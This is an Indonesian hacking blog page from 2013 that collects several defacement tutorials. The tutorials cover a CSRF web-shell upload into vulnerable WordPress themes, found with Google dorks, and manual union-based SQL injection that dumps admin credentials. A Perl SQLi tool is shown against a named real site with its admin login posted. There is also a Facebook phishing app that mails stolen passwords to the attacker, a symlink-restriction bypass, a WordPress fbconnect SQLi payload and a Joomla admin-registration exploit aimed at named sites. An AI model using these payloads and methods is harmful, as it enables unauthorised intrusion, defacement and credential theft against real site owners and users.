PPC Iklan Blogger Indonesia

Sabtu, 08 Juni 2013

0 Cara Deface Web Dengan CSRF

09.32 Under From Unknown
[0 Comment]


                CSRF adalah singkatan dari Cross Site Request Forgery. Dengan CSRF ini, dapat memungkinkan kita untuk menanam shell pada web yang memiliki bug ini menggunakan suatu script. Bagaimana caranya? Simak yang satu ini.




1. Download script CSRF disini

2. Untuk mencari target, gunakan salah satu dork berikut ke google :
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico
inurl:/wp-content/themes/qreator
inurl:/wp-content/themes/cleanple

3. Buka salah satu web yang akan dijadikan target.
Contoh : www.site.com/wp-content/themes/pacifico/images/
Ubah yang berwarna merah dengan theme/
Contoh : www.site.com/wp-content/themes/pacifico/theme/




4. Nah anda klik folder function lalu klik "Upload-bg.php" atau "uploadbg.php" atau "upload.php"

5. Jika muncul tulisan "error" berarti web itu vuln. Jika muncul tulisan "You must be logged to access this script" berarti tidak vuln, anda harus cari target lain.

6. Sekarang anda buka script CSRF yang tadi anda download dengan notepad (klik kanan -> open with -> notepad). Anda ganti text URLTARGET dengan link webnya. Misalkan www.site.co.uk/wp-content/themes/cleanple/theme/functions/uploadbg.php. Lalu di save.




7. Setelah pengeditan selesai & di save. Buka file CSRF yang sudah edit itu. Maka akan muncul form upload

8. Upload shell anda, jika belum punya download disini

9. Jika proses upload selesai, akan muncul tulisan yang menunjukkan dimana keberadaan shell anda misal seperti ini : www.site.co.uk/wp-content/themes/cleanple/images/bgs/25e732d93a9402n19847u0.php
Nah berarti 25e732d93a9402n19847u0.php adalah nama shell anda. Cara membukanya yaitu : www.site.com/wp-content/themes/cleanple/theme/functions/25e732d93a9402n19847u0.php

10. Dan muncullah shell anda. Silahkan anda otak atik web tersebut sesuka anda.

Read More »

0 Cara Deface Web Dengan SQL Manual

09.29 Under From Unknown
[0 Comment]


              Banyak cara yang dapat dilakukan untuk deface sebuah web, salah satunya yaitu dengan teknik SQL Injection. Banyak sekali para hacker/defacer yang menggunakan cara ini. Dan saya akan menunjukkan langkah - langkahnya.





1. Anda cari target web untuk di di deface menggunakan dork. Bisa anda cari disini

2. Ketikkan dork itu di kotak pencarian google, maka akan muncul banyak web di hasil pencarian. Silahkan anda buka salah satu

3. Tambahkan karakter ' pada akhir url'nya untuk mengetahui vulnerability'nya
Contoh : www.site.com/news.php?id=32'

4. Jika muncul tulisan seperti "syntax error" berarti web tersebut vuln alias bisa kita deface
Contoh errornya : warning: mysql_fetch_array(): supplied argument is not a valid MYSQL result resource in D:\inetpub\wwwroot\ajpower.net\html\news.php on line

5. Sekarang saatnya kita beraksi. Cari jumlah table yang ada pada database web tersebut dengan cara menambahkan karakter +order+by+1-- di belakang url
Contoh : www.site.com/news.php?id=32+order+by+1--

Anda coba satu persatu hingga muncul tulisan error.
Contoh : www.site.com/news.php?id=32+order+by+2--
www.site.com/news.php?id=32+order+by+3--
www.site.com/news.php?id=32+order+by+4--
Saya memisalkan jumlah table web ada 4 (errornya di 4)

6. Kemudian kita gunakan perintah union untuk mengeluarkan nomor yang nantinya kita gunakan. Tambahkan +union+select+1,2,3,4--
Contoh : www.site.com/news.php?id=32+union+select+1,2,3,4--
Saya memisalkan angka 3 yang keluar

7. Sekarang masukkan version() pada angka 3 untuk memaparkan version
Contoh : www.site.com/news.php?id=32+union+select+1,2,version(),4--

8. Kita munculkan nama - nama table yang ada pada web tersebut dengan memasukkan perintah table_name pada angka 3 dan perintah +from+information_schema.tables-- dibelakang url
Contoh : www.site.com/news.php?id=32+union+select+1,2,table_name,4+from+information_schema.tables--
Nantinya kita akan melihat nama nama table yang ada pada web

9. Kita lihat isi yang ada di dalam table tersebut dengan memasukkan perintah group_concat(table_name) pada angka 3 dan perintah +where+table_schema=database()-- di akhir url
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(table_name),4+from+information_schema.tables+where+table_schema=database()--

10. Selanjutnya kita keluarkan isi yang ada di table tersebut (column) dengan memasukkan perintah group_concat(column_name) pada angka 3 dan +from+information_schema.columns+where+table_name=0xHasilConvertTextTableAdmin-- di akhir url
Untuk langkah ke 10 ini silahkan anda convert terlebih dahulu text nama table'nya ke hexadecimal disini
Jadi misalkan nama table'nya tadi admin maka jika di convert akan menjadi 61646D696E
Contoh : www.site.com/news.php?id=32+union+select+1,2,group_concat(column_name),4+from+information_schema.columns+where+table_name=0x61646D696E--
Nanti akan muncul column yang berisikan username dan password

11. Lalu kita lihat isi dari column yang kita temukan. Saya misalkan nama tablenya adalah admin, dan isi dari table admin adalah column username & password. Maka masukkan perintah concat_ws(0x3a,"nama column yang ada di dalam table admin") pada angka 3 dan perintah +from+Admin-- di akhir url
Contoh :  www.site.com/news.php?id=32+union+select+1,2,concat_ws(0x3a,"username,password"),4+from+Admin--

12. Maka kita akan melihat username dan password admin dari web tersebut. Saatnya kita eksekusi.

13. Cari admin pagenya, biasanya dengan menambahkan tulisan berikut di akhir url web target.
/admin/ , /administrator/ , /webadmin/ , /adm/ , /webbase/
Contoh : www.site.com/admin/
Nah isikan username dan password yang tadi di dapat. Jika password berbentuk MD5 seperti e10adc3949ba59abbe56e057f20f883e, anda crack dulu disini

Memang tidaklah semudah membalik telapak tangan, belajarlah sedikit sedikit.
Read More »

Jumat, 07 Juni 2013

0 Sql Injection Via Perl ( Full Tutorial )

07.34 Under From Unknown
[0 Comment]
misi gan sebelumnya, moga gak repost ya, tool ini buatan si Pr0xY, ane juga gak kenal ama tuh orang, iseng" nyari cara load file sql injection di youtube malah dapet yg begini,,

yang perlu disiapkan:

*perl (bisa didownload di sini [untuk windows] / untuk linux biasanya sudah ada);
*injection tool versi 2.2.0 by Pr0xY (download disini) password nya : hnteam
*lagu kebangsaan hacker newbie community wakaka

setelah instal perl bagi yang windows atur file main.pl menjadi seperti ini
main.pl

PHP Code:
#!c:\strawberry\perl\bin  /* tempat program perl diinstal */
system("cls"); system('title SQLi Helper by Pr0xY');system("color 02");

require 
"inc/general.pl";
require 
"MySQL/blind.pl";
require 
"MySQL/injector.pl";

&
generalPrint("".$target,1);

require 
"inc/whatdo.pl";

@
columns_found = ();$shor_way = 0;$printer  = "";$concat   = "";

if(!(
$target =~ /.+/))
{
    print 
"Target: ";
    
chomp($target = <STDIN>);
}   
if(!(
$type =~ /\d+/) || !($comment =~ /.+/))
{
    &
firstChomp();
}
&
startInject();

exit; 

lalu cek, apakah perl sudah terinstal dengan cara kketik di cmd
perl -v
jika sudah lanjut di bawah

setelah itu kita buka cmd, masuk ke path letak file injection diletakkan,
lalu tulis perintah
PHP Code:
main.pl -h 
untuk help mau langsung inject juga bisa asalkan dah tau caranya

Spoiler: hide
[Image: image.jpg]

setelah masuk ke dalam :)
-c (comentar kosongin aja tulis -- )
-mc jumlah kolom yang mau km scan
-dt jenis database kalo MySql 0 kalo MsSql 1

Spoiler: hide
[Image: image.jpg]

lalu masukkan target nya, yang lemah akan sql injection wakaka
Spoiler: hide
[Image: image.jpg]

web telah terinjeksi, sekarang pilih mana yang mau lakukan
0 untuk menghentikan program
1 untuk melihat" name database yg satu server sama database tersebut (enak kan? wakaka)
2 untuk melihat isi tabel
3 untuk mendapatkan kolom
4 untuk mendapat data dari kolom yg sudah didapatkan
5 untuk load file (tritnya terpisah, mungkin besok dibikinnya, tar sore mau PM di sekolah)
6 untuk mendapat mysql.user (ane juga kurang ngerti sebenarnya kalo yg ini wakaka)
7 untuk menyimpan semua kegiatan yg kamu lakukan pada program ini
Spoiler: hide
[Image: image.jpg]

kita masukkan perintah 2 untuk melihat tabel pada database dreamarticle masukkan nama database dan kau akan tahu hasilnya wakaka
Spoiler: hide
[Image: image.jpg]

wah ! dah ketemu tuh tabel admin nya da_admin yaudah, kita coba lihat isi kolom yg ada pada tabel da_admin tersebut
Spoiler: hide
[Image: image.jpg]

setelah kolomnya terlihat kita pilih perintah no 4
setelah itu kita masukkan berapa kolom yg mau kita baca, ane mau baca semuanya, kan kolomnya ada 6 tuh, jadi ane tulis 6 deh
setelah itu tulis nama kolom yang mau kamu lihat isinya ( 6 kolom )
Spoiler: hide
[Image: image.jpg]

pada pilihan yg ditampilkan ketik aja n (ane juga kurang tau fungsinya, nanti kalo dah ada yg tau pm ane ya :) )
terus ketik waktu untuk mencarinya tulis aja 50
Spoiler: hide
[Image: image.jpg]

setelah klik enter dan tunggu hasilnya
Spoiler: hide
[Image: image.jpg]

YES!!! password admin telah di dapatkan
(maaf ya , waktu ane masuk ke login panel admin, ane buat user baru bernama exsnap wakaka )
Spoiler: hide
[Image: image.jpg]

data yg sudah di save tadi bisa dilihat di folder scans
Spoiler: hide
[Image: image.jpg]

site : http://www.pkwhg.com/admin/
user : admin
pass : admin

hasil dari tutor : http://www.pkwhg.com/admin/2012011906290794113.html
http://nachtvandeeuregio.be/sub_jogging2.php

untuk video bisa dilihat disini tutorial video

sekian tutor dari ane, kalo ada salah harap dimaklumi karna ane hanya seorang nubie yg mau berbagi Bahagia

thanks buat kaka" hn yg dah mau ane ajak ngobrol selama di IRC, yg bisa bantu ane semangat lagi
thanks to: killerbyte,dZhenway,_up,hogyz,einzten,ada lagi tapi lupa namanya (maaf)
satu lagi, orang pertama yg mau ngajarin ane :) kk blackz tapi ga tau kemana, dah jarang ketemu :(

selain bisa sql injection bisa juga load file, adminfinder, dll, load file tutornya ane buat besok aja ya, soalnya tar sore ane mau pm di sekolah,

SUMBER

cendolnya ka kalo boleh :)
Read More »

Kamis, 06 Juni 2013

1 Trick Hack Facebook 2013

03.04 Under From Unknown
[1 Comment]
sapa sih yang gak kenal Facebook??? Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter. Facebook dikenal karena kemudahan dan tentunya keamanannya.

Aman?? 100%?? hem..tidak ada yang sempurna.. banyak para hacker yang berusaha menembus pertahanan Facebook, seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di Faceboook. Tehnik lain?? hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.

Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.
Tata cara nya sebagai berikut:

1. Download scriptnya dulu http://www.mediafire.com/?448qgmyux5o2mb8 atau http://idws.us/jjfjdc
2. Cari server gratisan atau injekkan yang support .PHP ( tanya om Google ) atau .ASP ( http://www.jabry.net )
3. Facebook tentunya
Mulai pembuatannya deh :
Sudah disiapkan scriptnya?? kalau sudah, ubahlah di bagian yang saya tandai menjadi alamat e-mail anda

.PHP Code:
mail(
"youremailaddress@domain.com",

.ASP Code:
Mailer.RemoteHost = "smtp.yourhost.com"
Mailer.AddRecipient "your name", "youremailaddress@host.com"
lalu upload ke server anda..dan tugas pertama kita selesai. :)



[Image: sshot6j.jpg]
Lalu masuk ke http://www.facebook.com/pages/create dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.
Disini dituntut kepandaian kita mengolah kata agar berkesan menarik. Contoh "Cek Kepopuleran FB Anda" dan selesaikan langkah yang di anjurkan.
Kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana. Kalau udah di kolom "Alamat Web" kita isi http://www.facebook.com/ lalu selesai deh.
Saatnya kita masuk ke http://www.facebook.com/add.php?api_key=...1e44&pages dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang sudah didownload tadi.
Jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita. Lihat gambar dibawah ini




[Image: sshot7y.jpg]Terakhir, kita share halaman yang udah kita buat tadi, lalu minta teman - teman kita buat meng-klik tombol "Like" usahakan minimal 25 orang yang nge-like. Jadi kita bisa membuat "username" untuk halaman kita, misal jadi "http://www.facebook.com/pagechecker" dan berharap orang-orang mencoba aplikasi kita, lalu boom..panen password deh....cek folder spam di server e-mail kita.

Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he

DEMO
http://www.facebook.com/pages/Cek-Harga-...4949752878

tampilan kalau ada yang coba nih halaman kaya gini.. [Image: sshot3e.jpg]Dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he[Image: sshot5e.jpg]
Read More »

2 Bypass Symlink yang Forbidden

02.41 Under From Unknown
[2 Comment]
Mungkin cara ini masih bisa. 
Bypass Symlink Forbidden
1. pertama buat satu file php.ini .
Copy code dibawah :



safe_mode=OFF
disable_functions=NONE

terus paste dalam notepad dan save as
name : php.ini
File type : all file

2. Kemudian kita buat file .htaccess .
Copy code dibawah :

Options FollowSymLinks MultiViews Indexes ExecCGI

Paste dalam notepad dan save as
name : .htaccess
File type : all file

3. terus upload ke dalam directory yang ada file config symlinknya. ^_^

semoga berhasil . . . .
 
Read More »

Sabtu, 01 Juni 2013

0 Exploit Wordpress Blogs

10.25 Under From Unknown
[0 Comment]
[Image: wordpress-hack.jpg]

Dork: inurl:"fbconnect_action=myhome"

[Image: untitled24.JPG]

Klik situs Targetnya

[Image: untitled22.JPG]

Sekarang ubah URL :
?fbconnect_action=myhome&amp;userid=

Dengan URL ini :
?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--

[Image: untitled23.JPG]

Sekarang keluar Username dan Password Admin.

Encrypt Password MD5 (Blowfish) dengan software yang ada di sini
http://www.easy-share.com/1917245768/passwordspro.zip

Sesudah menemukan Passwordnya masuk ke halaman Page wp-admin atau wp-login.php
Read More »

0 [tutor] hack joomla versi terbaru

10.24 Under From Unknown
[0 Comment]
siang om" tante"
ketemu lagi nih sama ane yang Ganteng
jarang banget ane ngpost d SF hacking ya maklumlah bukan hacker CulasCulas
ok langsung aja
d sni ane mau kasih tutor hack joomla
tapi sebelumnya ente harus punya bahan"nya di sini

lalu ke om google dan masukin dork
Code:
Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:my

pilih salah satu dan kemudian masukin exploitnya
Code:
index.php?option=com_users&view=registration
contoh : http://http://badlishah.edu.my/web/index.php?option=com_users&view=registration

setelah itu klik kanan>view page source,atau bisa juga ctrl+u

kalo udah kliatan sourcenya ctrl+f atau find dan ketik hidden
dan cari nomor" yang seperti ini
Spoiler: hide
[Image: ivb7r9.jpg]

lalu buka file yang tadi di download dengan dreamweaver atau semacamnya dan masukkan seperti gambar di bawah ini
Spoiler: hide
[Image: 35bsi11.jpg]

lalu kembali lagi ke page source tadi dan ctrl+f lalu ketikkan regist
dan temukan kode seperti di bawah ini
Spoiler: hide
[Image: dnjyvq.jpg]

dan masukkan kode yang tadi bersama situs target lu sperti gambar ini
contoh : http://badlishah.edu.my/web/index.php/co...n.register
Spoiler: hide
[Image: 2e49d9v.jpg]

lalu buka file yang tadi lu download
dan klik register
NB:password sengaja tidak di samakan
Spoiler: hide
[Image: fd6jpt.jpg]

lalu ada peringatan kalo password tidak sama
masukkan kembali passwordnya (kali ini password harus sama)
lalu klik register
Spoiler: hide
[Image: qn09xz.jpg]

lalu cek email kalian,dan klik konfirmasi link'y
Spoiler: hide
[Image: 3508inp.jpg]

lalu masuk ke halaman admin
contoh : http://badlishah.edu.my/web/administrator
lalu masukkan user n password yg tadi kalian buat
Spoiler: hide
[Image: 2ezlnr5.jpg]

dan hasilnya kalian akan masuk sebagai admin BahagiaBahagiaBahagia
Spoiler: hide
[Image: 1rrogg.jpg]

cukup sekian tutor dari ane
semoga bermanfaat
salam ganteng Ganteng

found me here:
http://abaywashere.org Bigsmile
Read More »